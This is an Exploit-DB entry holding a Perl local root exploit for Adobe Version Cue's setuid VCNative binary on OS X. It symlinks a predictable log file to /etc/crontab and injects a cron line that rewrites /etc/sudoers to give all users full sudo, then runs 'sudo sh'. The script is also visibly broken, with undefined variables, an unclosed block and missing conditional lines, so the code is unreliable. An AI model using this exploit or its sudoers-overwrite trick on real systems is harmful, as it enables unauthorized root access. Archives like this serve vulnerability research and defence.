Adobe Version Cue 1.0/1.0.1 - Local Root Exploit OSX

ID EDB-ID:1185
Type exploitdb
Reporter vade79
Modified 2005-08-30T00:00:00


Adobe Version Cue 1.0/1.0.1 Local Root Exploit (OSX). CVE-2005-1842. Local exploit for osx platform

# Adobe Version Cue VCNative[OSX]: local root exploit.
# by: vade79/v9 (fakehalo/realhalo)
# Adobe Version Cue's VCNative program writes data to a log file in
# the current working directory while running as (setuid) root. the
# logfile is formated as <cwd>/VCNative-<pid>.log, which is easily
# predictable. you may link this file to any file on the system
# and overwrite its contents. use of the "-host" option (with
# "-port") will allow user-supplied data to be injected into the
# file.
# This exploit works by overwriting /etc/crontab with
# '* * * * * root echo "ALL ALL=(ALL) ALL">/etc/sudoers' and
# log garbage. within a short period of time crontab will overwrite
# /etc/sudoers and "sudo sh" to root is possible. this method is used
# because direct overwriting of /etc/sudoers will cause sudo to exit
# with configuration errors due to the log garbage, whereas crontab
# will ignore it. (this exploit requires both cron to be running and
# sudo to exist--this is generally default osx)

use POSIX;

$vcn_path="/Applications/Adobe Version Cue/tomcat/webapps/ROOT/" .
$vcn_pid=($$ + 1);
$ovrstr="* * * * * root echo \\\"ALL ALL=(ALL) ALL\\\">/etc/sudoers";

sub pexit{print("[!] @_.\n");exit(1);}
print("[*] Adobe Version Cue VCNative[OSX]: local root exploit.\n");
print("[*] by: vade79/v9 v9\ (fakehalo/realhalo)\n\n");
if(!-f $vcn_path){
pexit("VCNative binary doesn't appear to exist");
pexit("/etc/crontab and /etc/sudoers are required for this to work");
print("[*] sym-linking $ovrfile -> $vcn_tempfile.\n");
symlink($ovrfile,$vcn_tempfile)||pexit("couldn't link files.");
print("[*] running VCNative...\n");
system("\"$vcn_path\" -cwd $vcn_cwd -port 1 -host \"\n\n$ovrstr\n\n\"");
print("[*] removing $vcn_tempfile...\n");
pexit("$ovrfile was not modified, exploit failed");
print("[*] $ovrfile was overwritten successfully...\n");
print("[*] waiting for crontab to change /etc/sudoers...\n");
print("[*] /etc/sudoers has been modified.\n");
print("[*] attempting to \"sudo sh\". (use YOUR password)\n");
system("sudo sh");

# [2005-08-30]